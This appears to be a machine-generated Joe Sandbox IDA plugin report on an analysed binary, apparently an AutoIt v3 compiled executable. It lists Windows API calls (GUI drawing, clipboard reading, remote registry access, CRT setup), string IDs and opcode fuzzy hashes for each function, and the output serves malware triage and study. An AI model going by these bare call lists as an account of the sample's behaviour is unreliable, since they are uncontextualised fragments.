                                                    • API String ID: 1675784387-0
                                                    • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                    • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                                                    • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                    • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                                                    APIs
                                                    • GetSysColor.USER32(0000000E), ref: 00430913
                                                    • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                    • GetSysColor.USER32(00000012), ref: 00430933
                                                    • SetTextColor.GDI32(?,?), ref: 0043093B
                                                    • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                    • GetSysColor.USER32(0000000F), ref: 00430959
                                                    • CreateSolidBrush.GDI32(?), ref: 00430962
                                                    • GetSysColor.USER32(00000011), ref: 00430979
                                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                    • SelectObject.GDI32(?,00000000), ref: 0043099C
                                                    • SetBkColor.GDI32(?,?), ref: 004309A6
                                                    • SelectObject.GDI32(?,?), ref: 004309B4
                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                    • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                                    • DrawFocusRect.USER32(?,?), ref: 00430A91
                                                    • GetSysColor.USER32(00000011), ref: 00430A9F
                                                    • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                                                    • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                                    • SelectObject.GDI32(?,?), ref: 00430AD0
                                                    • DeleteObject.GDI32(00000105), ref: 00430ADC
                                                    • SelectObject.GDI32(?,?), ref: 00430AE3
                                                    • DeleteObject.GDI32(?), ref: 00430AE9
                                                    • SetTextColor.GDI32(?,?), ref: 00430AF0
                                                    • SetBkColor.GDI32(?,?), ref: 00430AFB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                    • String ID:
                                                    • API String ID: 1582027408-0
                                                    • Opcode ID: 2ef0f4abd11e064f748c4b34313f5c0fe44a91a6cb010614a33e037737a88e84
                                                    • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                                    • Opcode Fuzzy Hash: 2ef0f4abd11e064f748c4b34313f5c0fe44a91a6cb010614a33e037737a88e84
                                                    • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                                    APIs
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                                                    • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: CloseConnectCreateRegistry
                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                    • API String ID: 3217815495-966354055
                                                    • Opcode ID: ff115ad2982b2ac011ce19291b1e7fd7fbb968081a7030b714478602d8e116a6
                                                    • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                                                    • Opcode Fuzzy Hash: ff115ad2982b2ac011ce19291b1e7fd7fbb968081a7030b714478602d8e116a6
                                                    • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                                                    APIs
                                                    • GetCursorPos.USER32(?), ref: 004566AE
                                                    • GetDesktopWindow.USER32 ref: 004566C3
                                                    • GetWindowRect.USER32(00000000), ref: 004566CA
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                                                    • DestroyWindow.USER32(?), ref: 00456746
                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                                                    • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                                                    • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                                                    • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                                                    • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                                                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                                                    • IsWindowVisible.USER32(?), ref: 0045682C
                                                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                                                    • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                                                    • GetWindowRect.USER32(?,?), ref: 00456873
                                                    • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                                                    • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                                                    • CopyRect.USER32(?,?), ref: 004568BE
                                                    • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                    • String ID: ($,$tooltips_class32
                                                    • API String ID: 225202481-3320066284
                                                    • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                    • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                                                    • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                    • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                                                    APIs
                                                    • OpenClipboard.USER32(?), ref: 0046DCE7
                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                    • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                    • CloseClipboard.USER32 ref: 0046DD0D
                                                    • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                    • CloseClipboard.USER32 ref: 0046DD41
                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                    • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                    • CloseClipboard.USER32 ref: 0046DD99
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                    • String ID:
                                                    • API String ID: 15083398-0
                                                    • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                    • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                                                    • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                    • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                                                    APIs
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                    • GetWindowRect.USER32(?,?), ref: 00471CF7
                                                    • GetClientRect.USER32(?,?), ref: 00471D05
                                                    • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                                                    • GetSystemMetrics.USER32(00000008), ref: 00471D20
                                                    • GetSystemMetrics.USER32(00000004), ref: 00471D42
                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                                                    • GetSystemMetrics.USER32(00000007), ref: 00471D79
                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                                                    • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                                                    • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                                                    • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                                                    • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                                                    • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                                                    • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                                                    • GetClientRect.USER32(?,?), ref: 00471E8A
                                                    • GetStockObject.GDI32(00000011), ref: 00471EA6
                                                    • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                                                    • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                    • String ID: @$AutoIt v3 GUI
                                                    • API String ID: 867697134-3359773793
                                                    • Opcode ID: 00a77f97e553fd72a6cbe10c1c6169f4dfcf88cf398ac727729fd0aea825547b
                                                    • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                                                    • Opcode Fuzzy Hash: 00a77f97e553fd72a6cbe10c1c6169f4dfcf88cf398ac727729fd0aea825547b
                                                    • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                    • API String ID: 1503153545-1459072770
                                                    • Opcode ID: fdee644b799a79cc51680871cdb4e33d86fc0af8b03a6c9e9b934ea10f9254c8
                                                    • Instruction ID: bf9a9138137c8e48d15734b0b0bf1383f69a7efb75f9ce998fc77f2ad016157b
                                                    • Opcode Fuzzy Hash: fdee644b799a79cc51680871cdb4e33d86fc0af8b03a6c9e9b934ea10f9254c8
                                                    • Instruction Fuzzy Hash: D551F672A402043BD610BB269C43EFFB36C9F49715F10055FFE09A6242EA7DEA5183AD
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: __wcsicoll$__wcsnicmp
                                                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                                                    • API String ID: 790654849-32604322
                                                    • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                    • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                                                    • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                    • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a303ae421967ed805ccaf407991e05be4a725e9efa943f69ad4090a8a0f3d8d3
                                                    • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                                                    • Opcode Fuzzy Hash: a303ae421967ed805ccaf407991e05be4a725e9efa943f69ad4090a8a0f3d8d3
                                                    • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                                                    APIs
                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Window
                                                    • String ID: 0
                                                    • API String ID: 2353593579-4108050209
                                                    • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                    • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                                                    • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                    • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                                                    APIs
                                                    • GetSysColor.USER32(0000000F), ref: 0044A05E
                                                    • GetClientRect.USER32(?,?), ref: 0044A0D1
                                                    • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                                                    • GetWindowDC.USER32(?), ref: 0044A0F6
                                                    • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                                                    • ReleaseDC.USER32(?,?), ref: 0044A11B
                                                    • GetSysColor.USER32(0000000F), ref: 0044A131
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                                                    • GetSysColor.USER32(0000000F), ref: 0044A14F
                                                    • GetSysColor.USER32(00000005), ref: 0044A15B
                                                    • GetWindowDC.USER32(?), ref: 0044A1BE
                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                                                    • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                                                    • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                                                    • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                                                    • ReleaseDC.USER32(?,00000000), ref: 0044A229
                                                    • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                                                    • GetSysColor.USER32(00000008), ref: 0044A265
                                                    • SetTextColor.GDI32(?,00000000), ref: 0044A270
                                                    • SetBkMode.GDI32(?,00000001), ref: 0044A282
                                                    • GetStockObject.GDI32(00000005), ref: 0044A28A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                    • String ID:
                                                    • API String ID: 1744303182-0
                                                    • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                    • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                                                    • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                    • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                                                    • __mtterm.LIBCMT ref: 00417C34
                                                      • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                                      • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                                      • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                                                      • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                                                    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                                                    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                                                    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                                                    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                                                    • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                                                    • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                                                    • __init_pointers.LIBCMT ref: 00417CE6
                                                    • __calloc_crt.LIBCMT ref: 00417D54
                                                    • GetCurrentThreadId.KERNEL32 ref: 00417D80
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                    • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                    • API String ID: 4163708885-3819984048
                                                    • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                    • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                                                    • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                    • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: __wcsicoll$IconLoad
                                                    • String ID: blank$info$question$stop$warning
                                                    • API String ID: 2485277191-404129466
                                                    • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                    • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                                                    • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                    • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                                                    APIs
                                                    • LoadIconW.USER32(?,00000063), ref: 0045464C
